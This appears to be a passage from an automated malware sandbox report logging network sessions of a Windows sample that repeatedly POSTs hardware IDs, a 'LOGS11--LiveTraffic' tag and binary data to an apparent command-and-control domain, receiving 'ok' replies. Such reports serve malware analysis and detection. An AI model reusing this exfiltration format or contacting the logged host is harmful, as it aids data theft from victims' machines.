                                                                                                                                                        2024-12-23 07:19:11 UTC1369INData Raw: 34 34 61 64 0d 0a 37 38 77 59 42 73 73 4a 39 6c 79 70 58 4c 76 39 53 44 6c 38 69 45 71 58 6d 4c 61 5a 48 54 45 54 43 65 77 39 52 58 71 52 49 57 79 57 37 47 6b 65 35 6a 48 53 64 62 41 39 72 73 42 4e 42 55 44 70 54 2b 61 73 4e 71 56 31 55 52 6f 4e 43 41 46 64 64 72 31 6f 55 4d 76 30 41 44 36 79 4f 4f 73 4d 71 41 57 50 37 55 51 5a 65 49 78 43 68 34 53 65 6f 51 45 68 46 77 58 6f 43 55 6c 75 75 51 56 38 69 76 42 35 48 71 49 35 2f 6c 6d 6c 50 49 4c 42 61 47 52 64 36 55 34 54 6c 4b 72 5a 62 41 6e 6a 43 65 51 31 65 52 65 68 54 47 6a 54 7a 48 6b 50 72 32 6a 71 52 62 51 68 71 2f 56 63 43 55 79 59 65 72 75 49 67 72 6c 68 4b 51 63 39 6c 44 6c 4e 57 70 6b 42 52 49 72 4d 59 54 71 57 49 63 64 73 6b 54 32 6e 6f 48 56 6b 58 44 52 36 78 2b 53 4f 73 57 77 4a 34 77 6e 6b 4e
                                                                                                                                                        Data Ascii: 44ad78wYBssJ9lypXLv9SDl8iEqXmLaZHTETCew9RXqRIWyW7Gke5jHSdbA9rsBNBUDpT+asNqV1URoNCAFddr1oUMv0AD6yOOsMqAWP7UQZeIxCh4SeoQEhFwXoCUluuQV8ivB5HqI5/lmlPILBaGRd6U4TlKrZbAnjCeQ1eRehTGjTzHkPr2jqRbQhq/VcCUyYeruIgrlhKQc9lDlNWpkBRIrMYTqWIcdskT2noHVkXDR6x+SOsWwJ4wnkN
                                                                                                                                                        2024-12-23 07:19:11 UTC1369INData Raw: 4e 58 4f 37 6c 5a 55 4f 57 62 4f 70 78 6d 54 7a 61 77 56 77 31 54 49 52 2b 6f 35 79 53 6d 54 6b 64 41 78 58 63 46 58 31 61 70 52 31 77 68 76 42 4e 44 72 34 35 7a 6e 57 59 4d 62 66 59 64 54 78 63 6c 43 2b 47 7a 61 59 5a 48 53 30 48 42 64 42 4a 65 45 2b 59 4d 57 69 75 7a 57 52 65 39 6b 6d 32 63 64 55 46 33 73 46 6f 4e 46 33 70 54 71 2f 6b 73 71 55 35 4b 53 4d 56 37 43 56 6c 57 75 6b 52 53 4b 72 38 52 53 71 53 45 66 35 5a 74 42 47 33 69 54 77 4a 54 4c 42 2f 68 70 57 6d 67 55 67 41 56 67 56 49 55 57 6b 4f 75 54 78 51 79 2f 51 41 50 72 49 34 36 77 79 6f 50 59 50 78 57 42 6c 77 70 46 36 58 72 4a 4b 78 45 54 6b 54 4e 66 77 39 65 51 61 56 4a 58 43 65 36 48 45 4f 6d 67 57 69 59 61 30 38 67 73 46 6f 5a 46 33 70 54 68 74 67 65 68 41 70 66 41 39 67 33 42 46 55 54 38
                                                                                                                                                        Data Ascii: NXO7lZUOWbOpxmTzawVw1TIR+o5ySmTkdAxXcFX1apR1whvBNDr45znWYMbfYdTxclC+GzaYZHS0HBdBJeE+YMWiuzWRe9km2cdUF3sFoNF3pTq/ksqU5KSMV7CVlWukRSKr8RSqSEf5ZtBG3iTwJTLB/hpWmgUgAVgVIUWkOuTxQy/QAPrI46wyoPYPxWBlwpF6XrJKxETkTNfw9eQaVJXCe6HEOmgWiYa08gsFoZF3pThtgehApfA9g3BFUT8
                                                                                                                                                        2024-12-23 07:19:11 UTC1369INData Raw: 38 45 67 2b 30 7a 47 50 62 62 51 4d 75 71 42 30 47 58 79 6f 64 6f 75 30 69 71 30 5a 42 52 4d 64 79 43 31 35 63 72 30 56 54 4c 62 55 4c 53 4b 61 4c 65 70 42 6a 42 57 72 78 56 6b 45 5a 59 68 53 35 71 33 48 6e 65 45 64 62 30 58 52 44 52 68 32 78 44 46 4d 68 38 30 45 50 70 70 42 37 6e 6e 67 4c 59 66 74 50 43 6c 45 69 46 72 50 73 4a 61 31 46 51 30 58 4d 64 41 74 4c 55 36 56 4d 52 6a 2b 31 45 6b 48 72 7a 44 71 63 63 6b 38 32 73 47 77 57 58 47 49 4d 37 2f 4a 70 6f 45 59 41 46 59 46 30 43 56 52 64 75 6b 68 53 4a 72 41 58 52 36 36 4b 66 70 46 6e 41 47 58 36 56 41 6c 58 4c 52 61 70 34 43 2b 70 53 30 5a 42 7a 44 64 4e 47 56 53 77 44 41 78 74 6c 41 4e 43 72 5a 56 72 72 6d 30 50 50 37 42 43 54 30 35 69 46 4b 32 72 63 65 64 48 54 45 66 4d 63 67 64 52 56 4b 74 4e 57 43
                                                                                                                                                        Data Ascii: 8Eg+0zGPbbQMuqB0GXyodou0iq0ZBRMdyC15cr0VTLbULSKaLepBjBWrxVkEZYhS5q3HneEdb0XRDRh2xDFMh80EPppB7nngLYftPClEiFrPsJa1FQ0XMdAtLU6VMRj+1EkHrzDqcck82sGwWXGIM7/JpoEYAFYF0CVRdukhSJrAXR66KfpFnAGX6VAlXLRap4C+pS0ZBzDdNGVSwDAxtlANCrZVrrm0PP7BCT05iFK2rcedHTEfMcgdRVKtNWC
                                                                                                                                                        2024-12-23 07:19:11 UTC1369INData Raw: 36 39 6f 36 6c 57 63 4a 62 2f 46 56 43 56 63 6b 47 61 58 6f 49 4b 52 4e 53 55 76 4b 64 41 6c 57 56 4b 35 49 56 43 61 30 46 30 6d 75 69 58 50 62 4a 45 39 70 36 42 31 5a 46 77 51 77 73 2f 6b 62 71 55 6c 62 44 64 34 35 47 68 6c 55 70 41 77 4d 62 62 67 52 51 4c 6d 48 63 35 4e 75 42 6d 37 30 56 77 78 51 49 68 61 73 37 69 32 70 54 6b 64 4e 7a 58 67 45 55 56 79 73 54 46 74 74 2f 56 6c 49 73 38 49 69 32 30 6f 45 65 4e 46 54 43 6b 56 69 44 4f 2f 79 61 61 42 47 41 42 57 42 65 51 70 59 57 36 5a 41 58 43 6d 68 47 55 53 69 6a 58 75 55 61 67 78 76 2b 6c 55 54 55 53 49 59 71 65 77 68 6f 30 52 53 54 4d 34 33 54 52 6c 55 73 41 77 4d 62 59 49 50 53 4b 79 4e 4f 4c 4a 74 46 47 2f 36 58 67 70 62 59 67 7a 76 38 6d 6d 67 52 67 41 56 67 58 6f 50 56 46 65 36 51 46 51 74 75 68 35
                                                                                                                                                        Data Ascii: 69o6lWcJb/FVCVckGaXoIKRNSUvKdAlWVK5IVCa0F0muiXPbJE9p6B1ZFwQws/kbqUlbDd45GhlUpAwMbbgRQLmHc5NuBm70VwxQIhas7i2pTkdNzXgEUVysTFtt/VlIs8Ii20oEeNFTCkViDO/yaaBGABWBeQpYW6ZAXCmhGUSijXuUagxv+lUTUSIYqewho0RSTM43TRlUsAwMbYIPSKyNOLJtFG/6XgpbYgzv8mmgRgAVgXoPVFe6QFQtuh5
                                                                                                                                                        2024-12-23 07:19:11 UTC1369INData Raw: 4a 35 72 41 32 54 33 55 78 4e 57 4b 42 2b 67 37 43 36 73 57 45 74 66 79 6e 38 41 56 31 75 68 54 46 6f 74 73 68 52 50 36 38 77 36 6e 48 4a 50 4e 72 42 34 49 6b 41 30 47 65 50 49 50 72 46 41 52 30 48 58 66 41 4a 61 52 61 56 63 46 47 50 7a 43 45 69 36 77 69 4b 4e 65 68 68 70 37 78 4d 59 46 79 55 66 34 62 4e 70 72 45 56 4f 51 4d 70 7a 43 6c 78 62 71 30 6c 52 4a 37 38 56 54 71 4f 4c 63 4a 35 76 43 57 54 7a 55 77 35 57 4c 68 65 6f 35 53 44 6e 42 41 42 4b 32 54 64 62 47 57 57 34 53 30 77 67 6f 31 74 39 71 4a 4e 72 6a 6d 63 66 61 4c 4a 79 41 6c 73 68 46 71 62 37 61 62 67 45 57 51 33 47 65 30 4d 42 45 36 68 49 57 43 36 30 46 30 43 6d 6a 58 32 51 5a 51 56 67 34 6c 49 45 58 79 34 62 72 50 6b 6a 72 56 68 4a 52 4d 78 35 43 30 74 51 36 41 49 55 4b 71 74 5a 46 2b 75 77
                                                                                                                                                        Data Ascii: J5rA2T3UxNWKB+g7C6sWEtfyn8AV1uhTFotshRP68w6nHJPNrB4IkA0GePIPrFAR0HXfAJaRaVcFGPzCEi6wiKNehhp7xMYFyUf4bNprEVOQMpzClxbq0lRJ78VTqOLcJ5vCWTzUw5WLheo5SDnBABK2TdbGWW4S0wgo1t9qJNrjmcfaLJyAlshFqb7abgEWQ3Ge0MBE6hIWC60F0CmjX2QZQVg4lIEXy4brPkjrVhJRMx5C0tQ6AIUKqtZF+uw
                                                                                                                                                        2024-12-23 07:19:11 UTC1369INData Raw: 6c 6a 34 46 34 45 55 42 77 74 72 2b 77 39 6f 45 52 47 54 59 45 35 51 31 59 54 38 48 55 55 5a 66 4d 6d 41 65 75 61 4f 73 4d 71 4f 6d 33 2b 55 77 5a 42 4d 31 36 43 2f 44 2b 74 55 51 4a 72 78 6d 59 4b 54 31 36 36 44 42 70 74 74 56 6b 58 2b 38 77 36 6e 33 74 50 4e 71 41 50 57 67 4a 78 52 50 47 35 4e 75 6c 54 41 46 75 42 4c 31 45 58 45 37 6f 4d 44 47 33 30 47 6c 32 35 68 48 6d 4e 61 55 68 51 7a 6e 30 4b 51 53 4d 65 71 75 63 58 6d 56 39 44 51 38 39 77 46 55 67 54 35 67 78 62 62 65 73 67 44 2b 50 43 52 64 55 71 46 79 36 6f 48 54 52 55 4c 42 32 6d 2f 54 6a 71 61 6b 74 62 77 48 6f 49 56 52 47 70 51 55 51 71 38 31 63 50 72 63 49 69 79 79 52 50 61 75 45 64 57 51 64 77 53 50 53 34 66 76 63 59 58 77 50 59 4e 78 55 5a 43 2f 6f 43 46 44 2f 7a 51 51 2f 73 67 57 69 4a 62
                                                                                                                                                        Data Ascii: lj4F4EUBwtr+w9oERGTYE5Q1YT8HUUZfMmAeuaOsMqOm3+UwZBM16C/D+tUQJrxmYKT166DBpttVkX+8w6n3tPNqAPWgJxRPG5NulTAFuBL1EXE7oMDG30Gl25hHmNaUhQzn0KQSMequcXmV9DQ89wFUgT5gxbbesgD+PCRdUqFy6oHTRULB2m/TjqaktbwHoIVRGpQUQq81cPrcIiyyRPauEdWQdwSPS4fvcYXwPYNxUZC/oCFD/zQQ/sgWiJb
                                                                                                                                                        2024-12-23 07:19:11 UTC1369INData Raw: 64 43 68 64 73 55 36 65 72 63 66 55 45 41 45 6e 51 4e 31 73 4a 41 66 4d 5a 42 33 72 6a 53 31 44 6c 6d 7a 71 4e 4b 6c 63 38 76 68 30 54 46 33 70 54 35 75 67 37 74 55 78 44 57 38 49 77 50 57 64 31 71 30 74 53 4c 72 30 4f 58 75 6d 74 65 5a 42 6d 41 32 6e 6d 59 7a 39 43 49 52 32 76 37 44 2b 32 43 67 34 4e 7a 6a 64 62 59 42 4f 35 52 6c 4e 68 2b 31 56 65 75 49 78 78 6a 57 31 50 55 62 34 64 47 52 64 36 55 35 54 6f 4a 36 6c 4e 56 6c 79 4d 55 51 42 65 56 61 74 43 51 7a 7a 7a 56 77 2b 74 77 69 4c 4a 4a 45 39 71 34 52 31 5a 42 33 42 49 39 4c 68 2b 39 78 68 66 41 39 67 33 46 52 6b 4c 2b 77 49 55 50 2f 4e 42 44 2b 79 4d 64 35 70 70 41 57 33 69 54 77 64 55 4e 42 44 6d 31 52 65 43 52 30 31 49 7a 33 41 39 5a 33 4b 69 58 46 6b 69 74 43 64 78 6e 4a 4e 39 69 79 67 70 62 65
                                                                                                                                                        Data Ascii: dChdsU6ercfUEAEnQN1sJAfMZB3rjS1DlmzqNKlc8vh0TF3pT5ug7tUxDW8IwPWd1q0tSLr0OXumteZBmA2nmYz9CIR2v7D+2Cg4NzjdbYBO5RlNh+1VeuIxxjW1PUb4dGRd6U5ToJ6lNVlyMUQBeVatCQzzzVw+twiLJJE9q4R1ZB3BI9Lh+9xhfA9g3FRkL+wIUP/NBD+yMd5ppAW3iTwdUNBDm1ReCR01Iz3A9Z3KiXFkitCdxnJN9iygpbe


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        2192.168.2.749713104.21.32.964437624C:\Users\user\Desktop\LP4a6BowQN.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-23 07:19:13 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: multipart/form-data; boundary=69HI2EZ9KAF5WW7F
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 12838
                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:13 UTC12838OUTData Raw: 2d 2d 36 39 48 49 32 45 5a 39 4b 41 46 35 57 57 37 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 39 48 49 32 45 5a 39 4b 41 46 35 57 57 37 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 39 48 49 32 45 5a 39 4b 41 46 35 57 57 37 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                                                                                        Data Ascii: --69HI2EZ9KAF5WW7FContent-Disposition: form-data; name="hwid"A86234E3E87F5E5CAC8923850305D13E--69HI2EZ9KAF5WW7FContent-Disposition: form-data; name="pid"2--69HI2EZ9KAF5WW7FContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                                                                                        2024-12-23 07:19:14 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:13 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=4vlln2goci8t38vlg881ek0rlu; expires=Fri, 18 Apr 2025 01:05:52 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=azpYOApbgz8T2mXTX6rueiaXBBE62%2FSU7viptVPbRuDtCzpJ6C5JjmBc27CxsidMjiG7KFm1tXeNMGkrjcmsB0ASYTxmLkxwD2uGWVmi7hNQscAUQ34P9ZUDlhscyq1FkK0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f6695040aac42d5-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1547&rtt_var=608&sent=9&recv=18&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13775&delivery_rate=1761158&cwnd=221&unsent_bytes=0&cid=3dde522d238e8cc0&ts=1014&x=0"
                                                                                                                                                        2024-12-23 07:19:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                        2024-12-23 07:19:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        3192.168.2.749719104.21.32.964437624C:\Users\user\Desktop\LP4a6BowQN.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-23 07:19:15 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: multipart/form-data; boundary=1TVB1K1GX36I
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 15046
                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:15 UTC15046OUTData Raw: 2d 2d 31 54 56 42 31 4b 31 47 58 33 36 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 54 56 42 31 4b 31 47 58 33 36 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 54 56 42 31 4b 31 47 58 33 36 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 31 54 56 42 31 4b 31 47
                                                                                                                                                        Data Ascii: --1TVB1K1GX36IContent-Disposition: form-data; name="hwid"A86234E3E87F5E5CAC8923850305D13E--1TVB1K1GX36IContent-Disposition: form-data; name="pid"2--1TVB1K1GX36IContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--1TVB1K1G
                                                                                                                                                        2024-12-23 07:19:16 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:16 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=4d43ob3melqttdkem4tgjiu3h5; expires=Fri, 18 Apr 2025 01:05:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPBYAPnYJx2suRl7VWAuylVN41CLZwnIA1dKbY724ZV8QjOs4R%2F2vSHfBIwhCPjTlzTFcnbF83nmF6kgzhfoswdu3NooL3gz9nSl4pwM%2B1ug2SZzat6SRr102n8uMRhYoS8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f669514af3c41af-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1594&min_rtt=1593&rtt_var=601&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2837&recv_bytes=15979&delivery_rate=1817050&cwnd=224&unsent_bytes=0&cid=f82f842d568b7645&ts=984&x=0"
                                                                                                                                                        2024-12-23 07:19:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                        2024-12-23 07:19:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        4192.168.2.749725104.21.32.964437624C:\Users\user\Desktop\LP4a6BowQN.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-23 07:19:18 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: multipart/form-data; boundary=9SL1K37UU7GIEZY
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 20389
                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:18 UTC15331OUTData Raw: 2d 2d 39 53 4c 31 4b 33 37 55 55 37 47 49 45 5a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 39 53 4c 31 4b 33 37 55 55 37 47 49 45 5a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 53 4c 31 4b 33 37 55 55 37 47 49 45 5a 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                        Data Ascii: --9SL1K37UU7GIEZYContent-Disposition: form-data; name="hwid"A86234E3E87F5E5CAC8923850305D13E--9SL1K37UU7GIEZYContent-Disposition: form-data; name="pid"3--9SL1K37UU7GIEZYContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                        2024-12-23 07:19:18 UTC5058OUTData Raw: 00 00 b6 b9 fe 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0
                                                                                                                                                        Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                                                                        2024-12-23 07:19:19 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:19 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=j69ea2rvce9ckafvn66o3p89me; expires=Fri, 18 Apr 2025 01:05:57 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                        vary: accept-encoding
                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UG1Hp5rQ8zb5vJdbiUFdw2efFETEVzRDeI%2BYIEvt37uIbC6YhJ6qX2oyzYJLZF9di4%2FAm1PG3HLQN4C%2FsJC8m8nWmOXJ0BfeinA0bOXHwvIgBDc7pIIDRL2Ju1qciB130%2BA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                        Server: cloudflare
                                                                                                                                                        CF-RAY: 8f66952449a17271-EWR
                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2023&min_rtt=2000&rtt_var=767&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21347&delivery_rate=1460000&cwnd=225&unsent_bytes=0&cid=e2bd91cfdae43308&ts=976&x=0"
                                                                                                                                                        2024-12-23 07:19:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                        2024-12-23 07:19:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: 0


                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        5192.168.2.749735104.21.32.964437624C:\Users\user\Desktop\LP4a6BowQN.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-23 07:19:21 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Content-Type: multipart/form-data; boundary=6WVH1GHH
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Content-Length: 1173
                                                                                                                                                        Host: cuddlyready.xyz
                                                                                                                                                        2024-12-23 07:19:21 UTC1173OUTData Raw: 2d 2d 36 57 56 48 31 47 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 38 36 32 33 34 45 33 45 38 37 46 35 45 35 43 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 36 57 56 48 31 47 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 57 56 48 31 47 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 36 57 56 48 31 47 48 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                                                        Data Ascii: --6WVH1GHHContent-Disposition: form-data; name="hwid"A86234E3E87F5E5CAC8923850305D13E--6WVH1GHHContent-Disposition: form-data; name="pid"1--6WVH1GHHContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--6WVH1GHHContent-Di
                                                                                                                                                        2024-12-23 07:19:21 UTC1128INHTTP/1.1 200 OK
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:21 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: close
                                                                                                                                                        Set-Cookie: PHPSESSID=9d8b0i4ndo2cftvsqpcsu2evuk; expires=Fri, 18 Apr 2025 01:06:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        X-XSS-Protection: 1; mode=block
